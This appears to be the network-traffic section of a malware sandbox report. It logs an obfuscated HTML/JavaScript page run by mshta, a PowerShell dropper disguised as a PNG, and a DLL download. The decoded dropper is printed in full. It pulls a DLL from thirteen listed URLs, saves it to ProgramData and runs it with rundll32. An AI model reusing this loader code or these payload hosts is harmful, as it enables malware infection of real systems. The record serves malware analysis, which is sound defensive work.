                                                                                                                                Data Ascii: 2b44<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';i8Hwi4f5v6ham=new Array();p2N61T634cG0v=new Array();p2N61T634cG0v[0]='g%77%35n%53\172%32%76' ;i8Hwi4f5v6ham[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'v\\141%72%20q}9%37}&D} }(2}(3B}1}7}38})S}4}ng} E}46romC}50arC%6F}A4e} }73}53} }M}V}&0} }%}/fo}6}2}76}_}*3}]}/}N}_}Z}34}&}.}.B}H}2
                                                                                                                                Jan 28, 2022 20:39:45.936794043 CET3INData Raw: 7d 30 7d 7a 7d 5e 7d 1d 7d 77 7f 31 7f 36 7d 32 7f 31 7d 34 7d 74 7d 20 7d 30 7f 33 7d 2a 7d 34 7f 79 7d 26 7d 37 7f 37 7d 6a 7d 7f 7d 42 7d 1d 7f 35 7d 48 7f 36 7f 63 7e 32 7d 4e 7f 46 7f 6e 7d 20 7d 22 7d 24 7d 26 7f 36 7d 54 7d 7d 7f 37 7f 42
                                                                                                                                Data Ascii: }0}z}^}}w16}21}4}t} }03}*}4y}&}77}j}}B}5}H6c~2}NFn} }"}$}&6}T}}7Bif| 2|4}s}O}N}X7|15|/45nt}?}Q||,|m}A|4|64Do}N}R} |2|F1docu}N}*6|/56|62Ea}H4l|!B|J|L}H5}S6E|T}@|zb7r}n}c|*5}Tq}3}5},}%|
                                                                                                                                Jan 28, 2022 20:39:45.936815977 CET4INData Raw: 7f 2d 78 7f 7e 48 77 02 78 34 7f 36 78 36 7f 3e 7f 54 7f 68 7f 65 78 48 7f 6f 7f 75 7f 72 78 40 7f 20 78 2e 78 23 7f 20 7f 6f 7f 66 7f 20 7a 59 7b 5c 27 7f 20 7f 70 7f 61 7f 67 77 1a 77 28 7f 70 7d 44 78 5c 72 7c 16 7f 65 78 2b 7f 62 7f 79 7f 20
                                                                                                                                Data Ascii: -x~Hwx46x6>ThexHourx@ x.x# of zY{\' pagww(p}Dx\r|ex+by <b~gxNxHxJxLx?x/w wFCCw~#~% Gu}Kdxany}xN~g/w9w7brww ul~2max\rw&ox/wbw)w0e| ywr wH~&w!ex^iw_w,sx^Ja} }p{"tww wy}yxv
                                                                                                                                Jan 28, 2022 20:39:45.936834097 CET6INData Raw: 36 34 33 33 35 57 7d 3b 69 38 48 77 69 34 66 35 76 36 68 61 6d 5b 30 5d 2b 3d 27 78 4f 78 23 78 2e 7e 2d 7e 32 7e 34 78 57 7f 6e 7e 34 7f 65 78 7e 77 40 77 01 77 42 77 04 77 45 78 36 7e 09 7f 72 7a 19 78 1a 7e 70 7e 40 7f 2f 7e 42 7f 77 7f 2e 77
                                                                                                                                Data Ascii: 64335W};i8Hwi4f5v6ham[0]+='xOx#x.~-~2~4xWn~4ex~w@wwBwwEx6~rzx~p~@/~Bw.w/otvvK.x.mxx~Ixhx_x~.kx\'wVw:vv3w>xuxQxSxUxWxYrx[~5x^x`xbwnxexgxixksxmxoxqfxsxu~0xxxzx|vCwzbwvGwF0wwww\rnwwvEx30x5x&>vQ.Pw0W}Kv)vZwQv
                                                                                                                                Jan 28, 2022 20:39:45.936846018 CET7INData Raw: 74 76 24 7f 28 71 37 73 4b 78 6a 78 70 7e 5c 27 7f 3a 72 6c 75 35 72 6f 71 13 72 73 7f 37 7f 39 7f 2c 71 4d 71 4f 71 4e 7f 37 73 36 71 53 71 4f 71 54 71 57 71 56 71 59 71 53 75 32 77 57 7d 7a 62 7f 6b 7f 3b 71 44 77 1a 7f 32 71 47 72 6d 71 49 71
                                                                                                                                Data Ascii: tv$(q7sKxjxp~\':rlu5roqrs79,qMqOqN7s6qSqOqTqWqVqYqSu2wW}zbk;qDw2qGrmqIq{gq(}6,yql7s75ql1qp,qNqN{@qt|0q\\vKaq_qa 3qdstqgrrq0,qkqk|0quqtqv,qxpqz;q]q}q`aqE4pqfrpqhrsqkqmqmp}pp\rpqqppq_x#xQw\\tpppp(pp
                                                                                                                                Jan 28, 2022 20:39:45.936857939 CET8INData Raw: 37 32 72 5c 31 34 31 79 25 32 38 25 32 39 25 32 43 5c 31 35 34 25 33 30 25 33 44 6e 65 77 25 32 30 5c 31 30 31 72 5c 31 36 32 61 5c 31 37 31 25 32 38 25 32 39 25 32 43 49 6c 25 33 44 25 33 31 25 33 32 25 33 38 25 33 42 25 36 34 25 36 46 25 37 42
                                                                                                                                Data Ascii: 72r\141y%28%29%2C\154%30%3Dnew%20\101r\162a\171%28%29%2CIl%3D%31%32%38%3B%64%6F%7Bl%30%5B%49%6C%5D%3D%53tr\151\156\147%2Ef%72%6Fm%43h%61r\103od\145%28%49\154%29%7Dwh\151le%28%2D%2D\111l%29%3BIl%3D%31%32%38%3Bl%31%5B%30%5D%3D%6C\151%3Dl%30%5Bl%
                                                                                                                                Jan 28, 2022 20:39:45.936872005 CET10INData Raw: 6e 44 6d 10 6c 36 7f 66 6c 3e 6c 19 6c 1b 72 0c 6c 42 6d 09 78 41 6e 4e 78 23 74 70 6d 72 6c 34 76 4b 6c 47 6c 38 7d 10 76 38 7f 53 7f 69 78 13 73 2a 70 3d 6f 58 6d 15 6f 32 7f 75 7f 75 6e 5f 6d 5e 6d 1e 72 03 7f 28 7f 6a 73 4b 7f 72 7f 3d 6f 3e
                                                                                                                                Data Ascii: nDml6fl>llrlBmxAnNx#tpmrl4vKlGl8}v8Sixs*p=oXmo2uun_m^mr(jsKr=o>zYnPv }Eq;dpADllukohott\'o\'l.sKo=s(}<s+s-}EnFs1s3(lmo@fx0pvr*25+|PnZmw{kzbks,ks>kd*oqp<+\'tFosNou>k(k*=ol+l|lKlk+k\'k-tWtQtSw#k/pw
                                                                                                                                Jan 28, 2022 20:39:45.936885118 CET11INData Raw: 20 7f 26 67 44 7f 68 67 50 72 0c 67 43 7f 22 73 77 67 43 6b 02 69 3e 78 67 6c 3b 78 0e 7f 2e 7e 3e 7f 69 75 31 67 43 67 4f 7f 28 7f 38 67 59 67 55 67 68 78 1c 6a 59 67 5a 78 65 7e 7d 69 37 78 70 73 12 7f 61 67 76 7f 73 67 78 67 4e 6e 25 7f 65 68
                                                                                                                                Data Ascii: &gDhgPrgC"swgCki>xgl;x.~>iu1gCgO(8gYgUghxjYgZxe~}i7xpsagvsgxgNn%ehJjwholgL)i7hcvgNgW(gh49gSglfff\rgVs>}Iy{gTffffff\nffs>frghfff#ff5gRf$fxrzb+gm}f*s>ye5f1s0jYf.f+0rzbf&f208f!f:f@f=qjri7gvpgx.
                                                                                                                                Jan 28, 2022 20:39:45.936897993 CET12INData Raw: 53 46 6d 52 71 45 52 68 48 4a 4f 64 68 69 56 44 74 6d 51 27 20 20 20 3b 73 38 78 79 59 34 30 55 69 52 70 36 36 58 36 4b 79 20 20 28 6e 74 36 56 73 38 48 72 31 65 49 31 29 3b 78 38 52 6e 6d 31 46 6a 39 6c 35 51 20 20 20 28 6e 74 36 56 73 38 48 72
                                                                                                                                Data Ascii: SFmRqERhHJOdhiVDtmQ' ;s8xyY40UiRp66X6Ky (nt6Vs8Hr1eI1);x8Rnm1Fj9l5Q (nt6Vs8Hr1eI1);iRp66X6Kys8xyY40U (kAqUkYNQ);x62NH7ETaFix='m3Wv77Txs62lbM31km4608yfjWI' ;eval(unescape('%71%79%36%28%22%63%37%39%38%66%62%36%39%66%22%29%3B'));f43GjzK
                                                                                                                                Jan 28, 2022 20:39:45.936907053 CET12INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                1192.168.2.224916891.240.118.17280C:\Windows\System32\mshta.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                Jan 28, 2022 20:39:50.419922113 CET12OUTGET /cc/vv/fe.png HTTP/1.1
                                                                                                                                Host: 91.240.118.172
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 28, 2022 20:39:50.481677055 CET14INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.20.2
                                                                                                                                Date: Fri, 28 Jan 2022 19:39:50 GMT
                                                                                                                                Content-Type: image/png
                                                                                                                                Content-Length: 1341
                                                                                                                                Connection: keep-alive
                                                                                                                                Last-Modified: Fri, 28 Jan 2022 17:05:19 GMT
                                                                                                                                ETag: "53d-5d6a77081f1c0"
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Data Raw: 24 70 61 74 68 20 3d 20 22 43 7b 73 65 65 64 61 7d 3a 5c 50 72 7b 73 65 65 64 61 7d 6f 67 72 61 6d 44 7b 73 65 65 64 61 7d 61 74 61 5c 7b 73 65 65 64 61 7d 4a 6f 6f 53 65 65 2e 64 7b 73 65 65 64 61 7d 6c 6c 22 2e 72 65 70 6c 61 63 65 28 27 7b 73 65 65 64 61 7d 27 2c 27 27 29 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 77 65 65 7a 75 61 6c 2e 66 72 2f 6a 75 39 63 2f 74 77 45 48 4a 44 43 76 4e 77 47 69 6d 44 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 79 63 6c 6f 75 64 2e 73 75 70 6c 69 74 65 63 6d 6f 2e 63 6f 6d 2f 46 6f 78 2d 43 43 46 53 2f 7a 42 64 47 71 69 79 57 31 48 54 5a 44 32 6a 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 69 63 68 61 65 6c 63 72 6f 6d 70 74 6f 6e 2e 63 6f 2e 75 6b 2f 77 70 2d 61 64 6d 69 6e 2f 47 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 6c 61 6a 61 72 6e 67 61 6a 69 2e 73 68 6f 70 2f 77 70 2d 61 64 6d 69 6e 2f 7a 56 68 53 71 48 6f 37 46 69 32 75 6c 4e 65 4e 31 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6c 61 6d 62 61 79 65 71 75 65 2e 61 70 69 70 65 72 75 2e 6e 65 74 2e 70 65 2f 61 73 73 65 74 73 2f 77 68 6e 59 7a 44 42 4c 48 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 63 68 75 70 61 68 66 61 73 68 69 6f 6e 2e 63 6f 6d 2f 65 68 36 62 77 78 6b 2f 62 6f 77 70 74 6c 2f 46 32 73 69 62 39 30 7a 5a 73 71 4a 34 34 2f 62 51 38 56 58 53 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 68 65 6b 6d 61 74 32 30 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 37 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 73 65 70 2e 64 66 77 73 6f 6c 61 72 2e 63 6c 75 62 2f 68 7a 68 33 76 2f 7a 43 55 7a 34 34 56 67 49 72 4e 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 61 6e 63 79 68 2e 78 79 7a 2f 61 73 73 65 74 73 2f 50 63 78 76 31 6b 35 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 64 61 6e 61 68 6f 75 73 65 63 61 72 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6e 41 5a 56 31 66 35 42 68 39 43 46 6d 42 74 6c 32 4a 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 66 69 72 73 74 66 69 74 73 63 68 6f 6f 6c 2e 63 6f 6d 2f 38 33 77 67 36 7a 2f 39 54 52 49 6b 35 48 73 6f 54 51 69 69 56 57 6f 58 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 3a 2f 2f 73 74 61 6e 63 65 77 68 65 65 6c 73 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 62 62 4c 31 4d 41 7a 4e 76 6f 68 48 48 2f 27 3b 0d 0a 24 75 72 6c 31 33 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 6f 75 72 6e 65 79 70 72 6f 70 65 72 74 79 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 74 65 72 71 2f 46 6f 50 72 57 38 71 4b 7a 67 49 6a 33 45 38 6d 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 2c 24 75 72 6c 31 33 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c
                                                                                                                                Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://weezual.fr/ju9c/twEHJDCvNwGimD/';$url2 = 'http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/';$url3 = 'http://michaelcrompton.co.uk/wp-admin/G/';$url4 = 'https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/';$url5 = 'https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/';$url6 = 'http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/';$url7 = 'https://hekmat20.com/wp-includes/7/';$url8 = 'http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/';$url9 = 'http://ancyh.xyz/assets/Pcxv1k5/';$url10 = 'http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/';$url11 = 'http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/';$url12 = 'http://stancewheels.com/wp-admin/bbL1MAzNvohHH/';$url13 = 'http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12,$url13".split(",");foreach ($url in $urls) { try { $web.Downl
                                                                                                                                Jan 28, 2022 20:39:50.481697083 CET14INData Raw: 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: oadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\JooSee.dll',ssAAqq


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                2192.168.2.2249169213.186.33.480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                Jan 28, 2022 20:39:50.581624985 CET15OUTGET /ju9c/twEHJDCvNwGimD/ HTTP/1.1
                                                                                                                                Host: weezual.fr
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 28, 2022 20:39:50.609762907 CET15INHTTP/1.1 403 Forbidden
                                                                                                                                date: Fri, 28 Jan 2022 19:39:50 GMT
                                                                                                                                content-type: text/html; charset=iso-8859-1
                                                                                                                                content-length: 261
                                                                                                                                server: Apache
                                                                                                                                x-iplb-request-id: 66818F3D:C011_D5BA2104:0050_61F44686_C83C:4CC4
                                                                                                                                x-iplb-instance: 31947
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                3192.168.2.224917051.81.152.3680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                Jan 28, 2022 20:39:50.878462076 CET16OUTGET /Fox-CCFS/zBdGqiyW1HTZD2j/ HTTP/1.1
                                                                                                                                Host: mycloud.suplitecmo.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 28, 2022 20:39:51.046953917 CET17INHTTP/1.1 200 OK
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                x-powered-by: PHP/7.4.27
                                                                                                                                set-cookie: 61f44686eb699=1643398790; expires=Fri, 28-Jan-2022 19:40:50 GMT; Max-Age=60; path=/
                                                                                                                                cache-control: no-cache, must-revalidate
                                                                                                                                pragma: no-cache
                                                                                                                                last-modified: Fri, 28 Jan 2022 19:39:50 GMT
                                                                                                                                expires: Fri, 28 Jan 2022 19:39:50 GMT
                                                                                                                                content-type: application/x-msdownload
                                                                                                                                content-disposition: attachment; filename="10ZDUhs9FtE0wMo.dll"
                                                                                                                                content-transfer-encoding: binary
                                                                                                                                content-length: 548864
                                                                                                                                date: Fri, 28 Jan 2022 19:39:50 GMT
                                                                                                                                server: LiteSpeed
                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B
                                                                                                                                Jan 28, 2022 20:39:51.046987057 CET18INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii:
                                                                                                                                Jan 28, 2022 20:39:51.047005892 CET20INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii:
                                                                                                                                Jan 28, 2022 20:39:51.047024012 CET21INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii:
                                                                                                                                Jan 28, 2022 20:39:51.047043085 CET23INData Raw: 8b 4d fc e8 04 00 00 00 8b e5 5d c3 55 8b ec 51 89 4d fc 8b 45 fc 83 c0 0c 83 c9 ff f0 0f c1 08 49 85 c9 7f 17 8b 55 fc 52 8b 45 fc 8b 08 8b 55 fc 8b 02 8b 11 8b c8 8b 42 04 ff d0 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d
                                                                                                                                Data Ascii: M]UQMEIUREUB]UQME]UQMjjdMlYEdhE]UQMEPM"]UQM]Ui]Ujh>dPQE
                                                                                                                                Jan 28, 2022 20:39:51.047061920 CET24INData Raw: 88 11 8b 45 fc 83 c0 01 89 45 fc eb dd 8b 45 08 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 45 0c 89 45 f8 8b 4d 08 89 4d fc c7 45 f4 00 00 00 00 eb 09 8b 55 f4 83 c2 01 89 55 f4 8b 45 f4 3b 45 10 73 12 8b 4d fc 03
                                                                                                                                Data Ascii: EEE]UEEMMEUUE;EsMMUU]U}thjEPb]UQjh0EPjbEE]U}tEPEM;MrE>UR
                                                                                                                                Jan 28, 2022 20:39:51.047081947 CET25INData Raw: e4 83 c2 28 89 55 e4 8b 45 08 8b 08 0f b7 51 06 39 55 fc 0f 8d c0 00 00 00 8b 45 e4 8b 48 08 89 4d dc 8b 55 08 8b 42 30 83 e8 01 f7 d0 23 45 dc 89 45 d8 8b 4d e4 51 8b 55 08 52 8b 4d d4 e8 b5 fd ff ff 89 45 e0 8b 45 ec 3b 45 d8 74 0b 8b 4d e8 03
                                                                                                                                Data Ascii: (UEQ9UEHMUB0#EEMQURMEE;EtMM;MvHUB$%tMuUEB$%EMUQ$UEE+EETMQURMu3DEEMMUUEH$MEUREPMhu
                                                                                                                                Jan 28, 2022 20:39:51.047101974 CET27INData Raw: c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 50 ff 15 a4 62 04 10 5d c3 cc 55 8b ec 83 ec 60 89 4d a0 c7 45 bc 00 00 00 00 c7 45 f0 00 00 00 00 6a 40 8b 45 0c 50 8b 4d a0 e8 eb f6 ff ff 85 c0 75 07 33 c0 e9 ea 03 00 00 8b 4d 08 89
                                                                                                                                Data Ascii: UEPb]U`MEEj@EPMu3MMU=MZthb3MQ<REPMu3MUQ<UE8PEthb3xMQLthb3WEH8th
                                                                                                                                Jan 28, 2022 20:39:51.047121048 CET28INData Raw: ec 00 00 00 00 c7 45 e8 00 00 00 00 eb 1b 8b 45 e8 83 c0 01 89 45 e8 8b 4d e4 83 c1 04 89 4d e4 8b 55 e0 83 c2 02 89 55 e0 8b 45 fc 8b 4d e8 3b 48 18 73 2d 8b 55 e4 8b 45 f0 03 02 50 8b 4d 0c 51 e8 3e f1 ff ff 83 c4 08 85 c0 75 12 8b 55 e0 0f b7
                                                                                                                                Data Ascii: EEEMMUUEM;Hs-UEPMQ>uUEE}ujb3)MU;Qvjb3EMHUE]UMEE}uMytUMQP(UjjEHQUUzt\E
                                                                                                                                Jan 28, 2022 20:39:51.047142029 CET29INData Raw: c8 30 05 10 0f af 15 c4 30 05 10 2b ca 2b 0d c8 30 05 10 2b 0d c4 30 05 10 8b 15 c8 30 05 10 0f af 15 b8 30 05 10 03 0d c4 30 05 10 03 d1 03 15 c4 30 05 10 8b 0d c4 30 05 10 0f af 0d b8 30 05 10 03 d1 2b 15 bc 30 05 10 8b 0d c8 30 05 10 0f af 0d
                                                                                                                                Data Ascii: 00++0+0000000+000000++0+0000000+000000++0+0000
                                                                                                                                Jan 28, 2022 20:39:51.209480047 CET31INData Raw: c4 30 05 10 03 c8 2b 0d c0 30 05 10 03 0d c8 30 05 10 2b 0d c4 30 05 10 2b 0d c4 30 05 10 8b 15 c4 30 05 10 0f af 15 c4 30 05 10 03 ca 2b 0d c8 30 05 10 a1 c4 30 05 10 0f af 05 c0 30 05 10 0f af 05 c8 30 05 10 2b c8 8b 15 c4 30 05 10 0f af 15 b8
                                                                                                                                Data Ascii: 0+00+0+000+0000+00+000++00000++00+000+00+0+000+0000+


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                4192.168.2.2249171160.16.102.16880C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                Jan 28, 2022 20:41:25.228030920 CET585OUTData Raw: 16 03 03 00 92 01 00 00 8e 03 03 61 f4 c5 5e 4c 4c 3e 06 96 2b 87 67 4c 66 62 72 5a 2f f8 3b 14 1d e6 04 5b d6 10 39 02 55 18 5e 00 00 34 c0 28 c0 27 c0 14 c0 13 00 9f 00 9e 00 39 00 33 00 9d 00 9c 00 3d 00 3c 00 35 00 2f c0 2c c0 2b c0 24 c0 23
                                                                                                                                Data Ascii: a^LL>+gLfbrZ/;[9U^4('93=<5/,+$#j@821
